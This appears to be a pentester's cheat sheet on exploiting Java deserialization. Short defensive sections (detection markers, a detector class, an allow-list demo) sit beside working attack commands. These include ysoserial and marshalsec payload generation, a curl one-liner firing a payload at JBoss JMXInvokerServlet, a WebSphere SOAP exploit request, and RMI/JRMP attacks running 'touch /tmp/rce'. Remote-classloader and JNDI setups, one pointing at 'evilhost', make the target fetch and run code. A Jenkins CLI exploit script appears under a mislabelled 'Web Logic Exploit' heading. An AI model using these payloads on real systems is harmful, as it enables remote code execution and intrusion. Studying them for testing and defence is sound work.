Java Deserialization¶
In-depth blog post on the WebLogic, WebSphere, JBoss, Jenkins and OpenNMS exploits
Java Deserialization Cheat Sheet
Encoding Payloads to exfil data
Detecting Java Serialization:
- Hex data begins with AC ED 00 05
- Base64 data begins with rO0AB
- Content Type is application/x-java-serialized-object
- gzip data begins with H4sIAAAAAAAAAJ
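The markers above can be checked mechanically at a proxy or in a servlet filter. The following is an added example, not code from the original page: it classifies a parameter or cookie value as a raw, base64 or gzip+base64 serialized stream by looking for `AC ED 00 05` behind each encoding. It assumes Java 9+ (for `InputStream.readNBytes`) and uses constructed sample values.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.zip.GZIPInputStream;

// Added example, not from the original page: classify a parameter or cookie value
// by the markers listed above. Assumes Java 9+ (readNBytes). Sample values are constructed.
public class SerializationDetector {
    private static final byte[] STREAM_MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05}; // AC ED 00 05
    private static final byte[] GZIP_MAGIC = {0x1f, (byte) 0x8b};                       // gzip member header

    static boolean startsWith(byte[] data, byte[] prefix) {
        if (data.length < prefix.length) return false;
        for (int i = 0; i < prefix.length; i++) {
            if (data[i] != prefix[i]) return false;
        }
        return true;
    }

    /** Returns "raw", "base64", "gzip+base64", or null when no serialization marker is present. */
    static String detect(byte[] value) {
        if (startsWith(value, STREAM_MAGIC)) return "raw";
        byte[] decoded;
        try {
            // URL-decode the value first if it came from a query string or cookie (+ and / are reserved).
            String text = new String(value, StandardCharsets.ISO_8859_1).trim();
            decoded = Base64.getDecoder().decode(text);                 // throws on non-base64 input
        } catch (IllegalArgumentException e) {
            return null;
        }
        if (startsWith(decoded, STREAM_MAGIC)) return "base64";         // text began with rO0AB
        if (startsWith(decoded, GZIP_MAGIC)) {                          // text began with H4sI
            try (GZIPInputStream gz = new GZIPInputStream(new ByteArrayInputStream(decoded))) {
                byte[] head = new byte[STREAM_MAGIC.length];
                if (gz.readNBytes(head, 0, head.length) == head.length && startsWith(head, STREAM_MAGIC)) {
                    return "gzip+base64";
                }
            } catch (IOException e) {
                return null;                                            // truncated or corrupt gzip data
            }
        }
        return null;
    }

    public static void main(String[] args) {
        System.out.println(detect(STREAM_MAGIC));                                            // raw
        System.out.println(detect("rO0ABQ==".getBytes(StandardCharsets.US_ASCII)));          // base64
        System.out.println(detect("JSESSIONID=abc123".getBytes(StandardCharsets.US_ASCII))); // null
    }
}
```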
Where Serialization is Used:
- In HTTP requests – Parameters, ViewState, Cookies, you name it.
- RMI – The extensively used Java RMI protocol is 100% based on serialization
- RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects
- JMX – Again, relies on serialized objects being shot over the wire
- Custom Protocols – Sending and receiving raw Java objects is the norm – which we’ll see in some of the exploits to come
Finding Gadgets Manually¶
If classes on the classpath implement these callbacks, deserialized data can trigger them and be used to exploit the server.
Callbacks invoked when an object is deserialized:
- readObject()
- readExternal()
- readResolve()
- readObjectNoData()
- validateObject()
- finalize()
Find Java Classes with GadgetProbe¶
https://github.com/BishopFox/GadgetProbe
Find Gadget Chains with Gadget Inspector¶
Finding Chains in Android files:
>>> java -Xmx2G -jar /opt/Hacking/Web/gadget-inspector-all.jar ./edge-dex2jar.jar
>>> cat gadget-chains.txt
org/apache/log4j/pattern/LogEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
org/apache/log4j/pattern/LogEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)
org/apache/log4j/spi/LoggingEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
org/apache/log4j/spi/LoggingEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)
Find Jars in ClassPath with EnumJavaLibs¶
https://github.com/redtimmy/EnumJavaLibs
./getPopularJars.py 20 | while read x; do wget --quiet -P ~/.serially/jars $x; sleep 5; done
How to Fix¶
Look-Ahead Checks: use a whitelist to validate the classes that can be deserialized
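The two points above (callbacks such as `readObject()` run while the stream is parsed, and a look-ahead whitelist stops that) in one runnable demonstration. This is an added example, not code from the original page: `Audited` is a stand-in for a gadget class whose `readObject()` has a side effect, and `SafeObjectInputStream` overrides `resolveClass()` to reject any class name not on the allow-list before the object is instantiated. It assumes Java 9+ (`Set.of`).

```java
import java.io.*;
import java.util.Set;

// Added example (not from the original page, Java 9+): a class whose private readObject() runs
// while the stream is parsed, and an ObjectInputStream that applies a look-ahead allow-list first.
public class LookAheadDemo {
    /** Stand-in for a gadget: the byte stream alone decides that this code runs. */
    static class Audited implements Serializable {
        private static final long serialVersionUID = 1L;
        static int callbacks = 0;
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            callbacks++;                                   // the caller never asked for this
        }
    }

    /** Look-ahead check: the class name is inspected before the object is instantiated. */
    static class SafeObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;
        SafeObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!allowed.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "not in deserialization allow-list");
            }
            return super.resolveClass(desc);
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] stream = serialize(new Audited());
        new ObjectInputStream(new ByteArrayInputStream(stream)).readObject();   // unfiltered: callback fires
        System.out.println("callbacks after plain ObjectInputStream: " + Audited.callbacks);      // 1
        try (ObjectInputStream in = new SafeObjectInputStream(new ByteArrayInputStream(stream), Set.of("java.lang.String"))) {
            in.readObject();                                                    // rejected in resolveClass
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("callbacks after look-ahead check: " + Audited.callbacks);             // still 1
    }
}
```

On Java 9+ (and 8u121+) the same allow-list can be expressed as an `ObjectInputFilter` via `ObjectInputStream.setObjectInputFilter` or the `jdk.serialFilter` system property; a rejection by that filter is what produces the `ObjectInputFilter REJECTED` log line shown in the JRMPClient note later on this page.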
Bypasses¶
SerialKillerBypassGadgetCollection
Payloads¶
Generating Payloads with ysoserial¶
Examples:
java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
nc 10.10.10.10 1099 < groovypayload.bin
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
java -jar ysoserial.jar URLDNS https://test.example.com
Generating Payloads with marshalsec¶
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF0 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMFX -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Burlap -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Java -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JsonIO -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JYAML -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Kryo -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.KryoAltStrategy -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF0 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF3 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.SnakeYAML -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.YAMLBeans -a
Generating Payloads with jexboss¶
Java Deserialization Exploitation Tool
DNS Lookup Example:
python2 jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns random.burpdomain.com
Jenkins Exploit using JexBoss:
python2 jexboss.py -u http://vulnerable_java_app/jenkins --jenkins
Apache Struts2 Vulnerabilities (CVE-2017-5638)
python2 jexboss.py -u http://vulnerable_java_app/path.action --struts2
Exploiting JBoss¶
Paths to Check:
- /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
- /web-console/ServerInfo.jsp
- /invoker/JMXInvokerServlet
- /invoker/readonly
- /invoker/
- /
- /admin-console/
JBoss Exploit Example:
java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | curl -H "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue" --data-binary @- -X POST -vvv http://test.com:8080/invoker/JMXInvokerServlet
Remote Class Loading Exploit¶
Create Payload:
java -jar ysoserial.jar C3P0 http://127.0.0.1:8080/:ExportObject > payload.bin
Setup Server:
>>> git clone https://github.com/sciccone/evil-remote-classloader
>>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -p 8080 -c "id>/tmp/rce"
[+] Remote classloader configured.
[+] Listening on http:127.0.0.1:8080 - Class name: ExportObject
JNDI Lookup Exploitation¶
Create Payload:
java -jar ysoserial.jar SpringJta "ldap://evilhost:1389/ExportObject" > payload.bin
Setup Server:
>>> git clone https://github.com/sciccone/evil-ldap-service
>>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -lp 1389 -p 8080 -c "id>/tmp/rce"
DNS Resolution Exploitation¶
Create Payload:
java -jar ysoserial.jar URLDNS "http://<random>.burp.example.com" > payload.bin
Get Classes to use:
GadgetProbe
JRMPClient Exploitation¶
Create Payload:
java -jar ysoserial.jar JRMPClient 127.0.0.1:9090 > payload.bin
Setup Server:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9090 CommonsCollections4 "id>/tmp/rce"
Note
If you get an error similar to the one below, the class is blocked by the deserialization filter of the running JDK.
Mar 09, 2020 5:58:50 PM java.io.ObjectInputStream filterCheck
INFO: ObjectInputFilter REJECTED: class java.util.PriorityQueue, array length: -1, nRefs: 2, depth: 1, bytes: 124, ex: n/a
Web Logic Exploit¶
```python
#!/usr/bin/env python3
# usage: ./jenkins.py URL /path/to/payload
from urllib.parse import urlparse
import socket, sys, requests
import base64

url = urlparse(sys.argv[1])
payload_file = sys.argv[2]

# Query Jenkins over HTTP to find what port the CLI listener is on
r = requests.get("{scheme}://{netloc}".format(scheme=url.scheme, netloc=url.netloc))
cli_port = int(r.headers['X-Jenkins-CLI-Port'])

# Open a socket to the CLI port (hostname only; netloc may carry the HTTP port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (url.hostname, cli_port)
print(f"Connecting to {url.hostname} port {cli_port}")
sock.connect(server_address)

# Send headers: 0x14 = 20 = len("Protocol:CLI-connect")
headers = b'\x00\x14Protocol:CLI-connect'
print(f'Sending "{headers}"')
sock.send(headers)
data = sock.recv(1024)
# print(f'received "{data}"', file=sys.stderr)
data = sock.recv(1024)
# print(f'received "{data}"', file=sys.stderr)

# Build the remoting frame: capacity marker, base64 payload, trailer
payloadObj = open(payload_file, 'rb').read()
payload_b64 = base64.b64encode(payloadObj)
payload = b"<===[JENKINS REMOTING CAPACITY]===>"
payload += payload_b64
payload += bytes.fromhex("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")
print('sending payload...')
'''outf = open('payload.tmp', 'wb')
outf.write(payload)
outf.close()'''
sock.send(payload)
sock.close()
```
WebSphere SOAP Exploit¶
Example Request:
echo -e "<?xml version='1.0' encoding='UTF-8'?>\n
<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.1\" ns0:JMXMessageVersion=\"1.2.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$(java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | base64)</objectname>\n<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>\n</ns1:getAttribute>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>" | curl -H "Content-Type: text/xml; charset=utf-8" -H 'SOAPAction: "urn:AdminService"' --data-binary @- -X POST -vvv https://test.com:8880/
RMI Exploiting¶
Introduction to Java RMI with examples
- https://www.geeksforgeeks.org/remote-method-invocation-in-java/
- https://mkyong.com/java/java-rmi-distributed-objects-example/
Well-written research on how to attack Java RMI
- https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/
- https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/
- https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf
Latest bypass gadget for the RMI registry whitelist (fixed in JDK8u241)
- https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/
- https://www.youtube.com/watch?v=tj6MdgfjQTU
Enumerate Classes with BaRMIe:
java -jar BaRMIe_v1.01.jar -enum 10.0.0.1 1099
Attack Service:
java -jar BaRMIe_v1.01.jar -attack 10.0.0.1 1099
Attack RMI with ysoserial:
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"
Attack JRMP with ysoserial:
java -cp ysoserial.jar ysoserial.exploit.JRMPClient 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"
JMX Exploitation¶
https://github.com/mogwailabs/mjet
JMS Exploitation¶
https://github.com/matthiaskaiser/jmet